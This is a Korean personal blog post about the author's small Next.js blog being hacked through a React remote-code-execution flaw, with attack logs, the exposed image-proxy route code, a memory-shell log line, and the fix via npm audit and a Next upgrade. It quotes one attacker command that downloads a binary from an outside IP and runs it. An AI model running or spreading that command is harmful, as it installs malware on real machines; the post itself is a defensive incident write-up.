맨 처음 보안 이슈를 접했던건 12월 5일 새벽이었다.
리액트에서 인증 없이 원격 코드 실행이 가능하다는 것.
해당 뉴스를 접하고 다른 사람에게 알렸지만, 나는 괜찮으려니 싶어 아무 생각없이 넘겼다.
1. 해킹 흔적 발견
그런데 블로그 코드를 업데이트 하려고 접속했더니 터미널에 웬 명령어가 실행된 흔적을 발견했다.
/bin/sh: powershell: command not found
⨯ [Error: Command failed: powershell -c "41*271"
/bin/sh: powershell: command not found
] {
status: 127,
signal: null,
output: [Array],
pid: 66631,
stdout: <Buffer >,
stderr: <Buffer 2f 62 69 6e 2f 73 68 3a 20 70 6f 77 65 72 73 68 65 6c 6c 3a 20 63 6f 6d 6d 61 6e 64 20 6e 6f 74 20 66 6f 75 6e 64 0a>,
digest: '3337667987'
}
/bin/sh: powershell: command not found
⨯ [Error: Command failed: powershell -c "41*271"
/bin/sh: powershell: command not found해당 코드를 디버깅해보니 curl 명령어로 악성 파일을 다운받아 실행하려고 하고 있었다.
api의 취약점을 발견 하고, 해당 api를 모두 닫아버렸다.
curl -s http://154.17.26.41:15932/gund -o /tmp/gund && chmod +x /tmp/gund && /tmp/gund취약점은 내부 프록시 서버였는데, 이미지와 스크립트를 동시에 삽입해서 명령어를 실행하는 방식이었다.
해당 프록시 api는 닫았고, api를 함부로 외부에 노출시키면 절대 안된다는 경험을 얻었다.
// app/api/link-preview/image-proxy/route.ts
...
export async function GET(req: Request) {
try {
const { searchParams } = new URL(req.url)
const target = searchParams.get('url')
if (!target) return NextResponse.json({ error: 'url required' }, { status: 400 })
const u = new URL(target)
if (!ALLOWED_PROTOCOLS.has(u.protocol)) {
return NextResponse.json({ error: 'invalid protocol' }, { status: 400 })
const res = await fetch(u, {
headers: { 'User-Agent': UA },
redirect: 'follow',
cache: 'no-store',
})
if (!res.ok || !res.body) {
return NextResponse.json({ error: `Upstream ${res.status}` }, { status: 502 })
}
...2. React2Shell 공격
그 뒤로, 아무리 취약점을 보완해도 게속 해킹 공격이 들어왔다.
한번은 터미널에서 이런 로그가 떴다.
[MemShell] Loaded successfully (ESM compatible + stealth UA)처음 보는 로그라서 AI에게 물어보니 해커들이 공격을 위해 많이 사용하는 메모리 셀이라고 했다.
nodejs를 재시작 해보기도 하고, npm 패키지를 모두 지웠다가 재설치해보기도 하고, 서버를 재시동 하기도 해봤다.
하지만 공격이 끊임없이 들어와서 어떻게 할까 하던 찰나, 내가 next와 react를 업데이트 하지 않았다 것이 문득 생각났다.
npm으로 취약점을 확인하고 수정해 주었다.
npm audit
npm audit fix이후에는 서버를 운영해도 터미널에 이상한 로그가 뜨는 일은 없었다.
3. 느낀점
나 혼자 운영하는, 하루 50명도 들어오지 않는 이 블로그에 뭘 볼게 있다고 계속 들어오는지 모르겠다.
당연히 스캔봇으로 취약점을 탐지하고 계속 공격하는 것이겠지만, 상당히 언짢다.
그리고 취약점이 있을 때, 바로 바로 대응하는 것이 중요하다는 사실을 깨달았다.
next를 15에서 16으로 업그레이드 하면서 수정해줘야 할 것도 있어 불편하기도 했지만, 그것보다 보안이 훨씬 중요했다.
앞으로는 GeekNews에 자주 들락거려야 겠다.
댓글을 불러오는 중...